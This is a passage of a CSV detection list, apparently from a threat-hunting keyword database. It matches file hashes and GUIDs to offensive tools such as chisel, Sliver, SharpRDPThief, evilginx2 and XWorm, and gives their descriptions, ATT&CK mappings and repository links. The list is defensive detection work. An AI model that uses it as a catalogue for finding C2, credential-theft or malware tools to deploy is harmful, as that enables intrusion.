the password stored by Microsoft Remote Desktop Connection utility inside the .rdp files.","T1110 - T1560.001 - T1555.003 - T1212","TA0006 - TA0007","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/remote_desktop_password.html","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*20792cb4150c6f086ad7c096ccf60c8213c2e68877caa7106abb62ad8a50529a*",".{0,1000}20792cb4150c6f086ad7c096ccf60c8213c2e68877caa7106abb62ad8a50529a.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*208106c83c543b4b6f32f21049b2ddd4927c310fde1a5a6caf9707dd47289037*",".{0,1000}208106c83c543b4b6f32f21049b2ddd4927c310fde1a5a6caf9707dd47289037.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*208cbef97b76474b1f24ca20f078a5e2077c50a5239c97aa332a297bd3f056e7*",".{0,1000}208cbef97b76474b1f24ca20f078a5e2077c50a5239c97aa332a297bd3f056e7.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*208d9e93e6dcf6d31df62abcaf50dceeaaccbc174496d495de8f4bb066c2547a*",".{0,1000}208d9e93e6dcf6d31df62abcaf50dceeaaccbc174496d495de8f4bb066c2547a.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" 
"*20B3AA84-9CA7-43E5-B0CD-8DBA5091DF92*",".{0,1000}20B3AA84\-9CA7\-43E5\-B0CD\-8DBA5091DF92.{0,1000}","offensive_tool_keyword","SharpRDPThief","A C# implementation of RDPThief to steal credentials from RDP","T1056.004 - T1110 - T1563.002","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/passthehashbrowns/SharpRDPThief","1","0","N/A","10","2","154","28","2020-08-28T03:48:51Z","2020-08-26T22:27:36Z" "*20da9df37baa7ae4e08eb46269a8684cee14983f22a31827a51cc3573b3d666f*",".{0,1000}20da9df37baa7ae4e08eb46269a8684cee14983f22a31827a51cc3573b3d666f.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*20ea253cc72883a4744a712d7dc06622b1655b70b4c32d2b74e4f2650919e2ec*",".{0,1000}20ea253cc72883a4744a712d7dc06622b1655b70b4c32d2b74e4f2650919e2ec.{0,1000}","offensive_tool_keyword","SharpBuster","This is a C# implementation of a directory brute forcing tool designed to allow for in-memory execution","T1087 - T1112 - T1048.003 - T1105","TA0007 - TA0040 - TA0002","N/A","N/A","Discovery","https://github.com/passthehashbrowns/SharpBuster","1","0","N/A","7","1","60","7","2020-09-02T15:46:03Z","2020-08-31T00:33:02Z" "*21114d71b2fd8ce79dcda7322f26300e4e6aeca8afe659a6054b9bc9eabe1500*",".{0,1000}21114d71b2fd8ce79dcda7322f26300e4e6aeca8afe659a6054b9bc9eabe1500.{0,1000}","offensive_tool_keyword","sliver","Sliver 
is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*2116E6C5-F609-4CA8-B1A1-E87B7BE770A4*",".{0,1000}2116E6C5\-F609\-4CA8\-B1A1\-E87B7BE770A4.{0,1000}","offensive_tool_keyword","PassTheChallenge","Recovering NTLM hashes from Credential Guard","T1003 - T1555.002","TA0006 - TA0005","N/A","N/A","Exploitation tools","https://github.com/ly4k/PassTheChallenge","1","0","N/A","9","4","318","23","2022-12-26T01:09:18Z","2022-12-26T00:56:40Z" "*211a24a768f959cb3089aeeb0ed1062c056b15a3ec43e9a4278a5a5f263adbda*",".{0,1000}211a24a768f959cb3089aeeb0ed1062c056b15a3ec43e9a4278a5a5f263adbda.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*211A4598-B46E-4CD3-BA5A-1EC259D4DB5A*",".{0,1000}211A4598\-B46E\-4CD3\-BA5A\-1EC259D4DB5A.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" "*2125a6fdc68bbe336f3a1e71163380872ee797a748ae6a30dfe282c984646bcc*",".{0,1000}2125a6fdc68bbe336f3a1e71163380872ee797a748ae6a30dfe282c984646bcc.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*214f24f7b1a2627400c2bbc78c054d1dfc7e4e25640b37a02ad76f0603184e25*",".{0,1000}214f24f7b1a2627400c2bbc78c054d1dfc7e4e25640b37a02ad76f0603184e25.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" 
"*2150D252-AA17-45C2-8981-A6DCF7055CA6*",".{0,1000}2150D252\-AA17\-45C2\-8981\-A6DCF7055CA6.{0,1000}","offensive_tool_keyword","Koppeling","Adaptive DLL hijacking / dynamic export forwarding","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/monoxgas/Koppeling","1","0","N/A","8","7","686","119","2020-07-06T14:47:57Z","2020-02-18T21:08:16Z" "*21582b3a68e8753322a1b1c7e550ae7fd305de4935de68fbde9f87570f484d00*",".{0,1000}21582b3a68e8753322a1b1c7e550ae7fd305de4935de68fbde9f87570f484d00.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","391","60","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" "*21582b3a68e8753322a1b1c7e550ae7fd305de4935de68fbde9f87570f484d00*",".{0,1000}21582b3a68e8753322a1b1c7e550ae7fd305de4935de68fbde9f87570f484d00.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","391","60","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" "*216361a2e00d7514c8300d3171dfd5cb8a5e6a061216125119a0d656d812de79*",".{0,1000}216361a2e00d7514c8300d3171dfd5cb8a5e6a061216125119a0d656d812de79.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" 
"*219a4c8a8686b08c5f7d98b1386d4445e501b89404fc8dba6abd47bb271d640a*",".{0,1000}219a4c8a8686b08c5f7d98b1386d4445e501b89404fc8dba6abd47bb271d640a.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*21c01746c200094f58a104a378b055484d3230adf28e44a60608834e945643b0*",".{0,1000}21c01746c200094f58a104a378b055484d3230adf28e44a60608834e945643b0.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*21f65143eef8b914b4b044ed3bbd518e05f5d8d08e326cf62e0f63e32de8a73f*",".{0,1000}21f65143eef8b914b4b044ed3bbd518e05f5d8d08e326cf62e0f63e32de8a73f.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - 
TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*21f7c3a31ac72448d1e1aa4624672d7c3f7644fe7598ff109f2f87fd8de48cd7*",".{0,1000}21f7c3a31ac72448d1e1aa4624672d7c3f7644fe7598ff109f2f87fd8de48cd7.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*21fd88a16e0aa75cc0d7e4f814cbb33e57de921ab5648f94a949318023fdec7d*",".{0,1000}21fd88a16e0aa75cc0d7e4f814cbb33e57de921ab5648f94a949318023fdec7d.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","N/A","10","10","176","58","2024-04-23T04:48:21Z","2020-07-17T20:47:56Z" "*223068bbe721dda949ae91d8260b2c7ee7b991c409be7d909841874c37c4f073*",".{0,1000}223068bbe721dda949ae91d8260b2c7ee7b991c409be7d909841874c37c4f073.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*223279bb628165de88609c81444f4a9bf9aac6f921ea155ac427a47d13b49084*",".{0,1000}223279bb628165de88609c81444f4a9bf9aac6f921ea155ac427a47d13b49084.{0,1000}","offensive_tool_keyword","ShimDB","Shim database 
persistence (Fin7 TTP)","T1546.011","TA0003","N/A","N/A","Persistence","https://github.com/jackson5sec/ShimDB","1","0","N/A","9","1","35","10","2020-02-25T09:41:53Z","2018-06-21T00:38:10Z" "*22379d19123e498aef75b4ed162a7c94361c1c23745cbae792e2242540997a61*",".{0,1000}22379d19123e498aef75b4ed162a7c94361c1c23745cbae792e2242540997a61.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*22379d69fa7ac3ae6679aba9a2346d5e66e819384641782e033f4a6efc4097c3*",".{0,1000}22379d69fa7ac3ae6679aba9a2346d5e66e819384641782e033f4a6efc4097c3.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*227f0eeb2991708692c78418ff7e45562670a00f6a72a4157adcc28d5f2f5b4f*",".{0,1000}227f0eeb2991708692c78418ff7e45562670a00f6a72a4157adcc28d5f2f5b4f.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - 
TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*22A156EA-2623-45C7-8E50-E864D9FC44D3*",".{0,1000}22A156EA\-2623\-45C7\-8E50\-E864D9FC44D3.{0,1000}","offensive_tool_keyword","SharpView","C# implementation of harmj0y's PowerView","T1018 - T1482 - T1087.002 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","Discovery","https://github.com/tevora-threat/SharpView/","1","0","N/A","10","10","921","179","2024-03-22T16:34:09Z","2018-07-24T21:15:04Z" "*22bb4f8fe6d57072e57342b605ec5ad9e08c4489c3b6849f2928bdf7ea23ca45*",".{0,1000}22bb4f8fe6d57072e57342b605ec5ad9e08c4489c3b6849f2928bdf7ea23ca45.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*233d785a077c50ad57de73da20e8696258a99edbc6961b92530dac81aede0bcb*",".{0,1000}233d785a077c50ad57de73da20e8696258a99edbc6961b92530dac81aede0bcb.{0,1000}","offensive_tool_keyword","RID-Hijacking","Windows RID Hijacking persistence technique","T1174","TA0003","N/A","N/A","Persistence","https://github.com/r4wd3r/RID-Hijacking","1","0","N/A","9","2","166","47","2022-09-02T08:43:14Z","2018-07-14T18:48:51Z" "*234208515c308c4f71b418b498fd8674f60e2e2e70049e5b80e9615ce8a814d0*",".{0,1000}234208515c308c4f71b418b498fd8674f60e2e2e70049e5b80e9615ce8a814d0.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*2364f199ecada6b55a841e967f23934f3da7c22060003d96874bd9b05c28209a*",".{0,1000}2364f199ecada6b55a841e967f23934f3da7c22060003d96874bd9b05c28209a.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*2366491D74D80C76F75A7F84ABF82C1E88518A615CB2332FDCC846181F60AEAE*",".{0,1000}2366491D74D80C76F75A7F84ABF82C1E88518A615CB2332FDCC846181F60AEAE.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" 
"*237ee4007c3014829ab2635b0caa1ee4c89c3cbf71e43e76b3c1e2da0931aa00*",".{0,1000}237ee4007c3014829ab2635b0caa1ee4c89c3cbf71e43e76b3c1e2da0931aa00.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*237f52a3509094464bb92f82a4908a60c7a4cc9db9748f0cc254e75311bb8b0d*",".{0,1000}237f52a3509094464bb92f82a4908a60c7a4cc9db9748f0cc254e75311bb8b0d.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*238214970b5fba5a7eab8d9fb50c79da888018ff2a63ad49d1114b8d478d559a*",".{0,1000}238214970b5fba5a7eab8d9fb50c79da888018ff2a63ad49d1114b8d478d559a.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*23975ac9-f51c-443a-8318-db006fd83100*",".{0,1000}23975ac9\-f51c\-443a\-8318\-db006fd83100.{0,1000}","offensive_tool_keyword","o365enum","Enumerate valid usernames from Office 365 using ActiveSync - Autodiscover v1 or office.com login page.","T1595 - T1595.002 - T1114 - T1114.001 - T1087 - T1087.002","TA0040 - TA0010 - TA0007","N/A","N/A","Exploitation tools","https://github.com/gremwell/o365enum","1","0","N/A","7","3","220","38","2024-04-12T21:42:47Z","2020-02-18T12:22:50Z" "*2398f4a8e53345325f44bdd9f0cc7401bd9025d736c6d43b372f4dea77bf75b8*",".{0,1000}2398f4a8e53345325f44bdd9f0cc7401bd9025d736c6d43b372f4dea77bf75b8.{0,1000}","offensive_tool_keyword","xz","backdoor in upstream xz/liblzma leading to ssh server compromise","T1174 - T1056 - T1210 - T1550 - T1036 - T1077","TA0005 - TA0006 - TA0003 - TA0008 - TA0009 - 
TA0011","N/A","N/A","Malware","https://securelist.com/xz-backdoor-story-part-1/112354/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*23ae98fd603067f7325d89af5ed67ccee713397c2fed01ac736711a1b32e28d4*",".{0,1000}23ae98fd603067f7325d89af5ed67ccee713397c2fed01ac736711a1b32e28d4.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/cobbr/SharpSploit","1","0","N/A","10","10","1692","303","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" "*23b828513db75348a8fcadd5db45d1593a5786a02b7efc1f6afb732db7ee97f2*",".{0,1000}23b828513db75348a8fcadd5db45d1593a5786a02b7efc1f6afb732db7ee97f2.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*23c71cff513e2be636c1084f3c8646f9601eef18b83a8010c84e824e5fd9ffba*",".{0,1000}23c71cff513e2be636c1084f3c8646f9601eef18b83a8010c84e824e5fd9ffba.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" 
"*23E06BF12C5BE7641EF89F557C3F6600E1F3881F8DCE7279C2112279E7EC3B988E1A85EC350149007DE78CE5566FCBD18F630D2CDB78C76AA06F2B121F0B3701*",".{0,1000}23E06BF12C5BE7641EF89F557C3F6600E1F3881F8DCE7279C2112279E7EC3B988E1A85EC350149007DE78CE5566FCBD18F630D2CDB78C76AA06F2B121F0B3701.{0,1000}","offensive_tool_keyword","combine_harvester","Rust in-memory dumper","T1055 - T1055.001 - T1055.012","TA0005 - TA0006","N/A","N/A","Defense Evasion","https://github.com/m3f157O/combine_harvester","1","0","N/A","10","2","106","17","2023-07-26T07:16:00Z","2023-07-20T07:37:51Z" "*23ed5325043d0b9e7a9115792b12817cec836ba09e5af2aab3408606da729681*",".{0,1000}23ed5325043d0b9e7a9115792b12817cec836ba09e5af2aab3408606da729681.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","C2 - Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","file_hash","10","10","22","3","2024-03-21T17:40:39Z","2024-01-31T23:40:16Z" "*241390219a0a773463601ca68b77af97453c20af00a66492a7a78c04d481d338*",".{0,1000}241390219a0a773463601ca68b77af97453c20af00a66492a7a78c04d481d338.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*2419CEDC-BF3A-4D8D-98F7-6403415BEEA4*",".{0,1000}2419CEDC\-BF3A\-4D8D\-98F7\-6403415BEEA4.{0,1000}","offensive_tool_keyword","PipeViewer ","A tool that shows detailed information about named pipes in Windows","T1022.002 - T1056.002","TA0005 - TA0009","N/A","N/A","discovery","https://github.com/cyberark/PipeViewer","1","0","N/A","5","6","529","42","2023-08-23T09:34:06Z","2022-12-22T12:35:34Z" "*2443660c8c3e8fcf80e028c6417a0110fde1f3a0961f70ffb960cbf64958e244*",".{0,1000}2443660c8c3e8fcf80e028c6417a0110fde1f3a0961f70ffb960cbf64958e244.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*24683c103edd19d58c02b001521660f0eae642200ad42454ae810bd7aefaf46b*",".{0,1000}24683c103edd19d58c02b001521660f0eae642200ad42454ae810bd7aefaf46b.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 
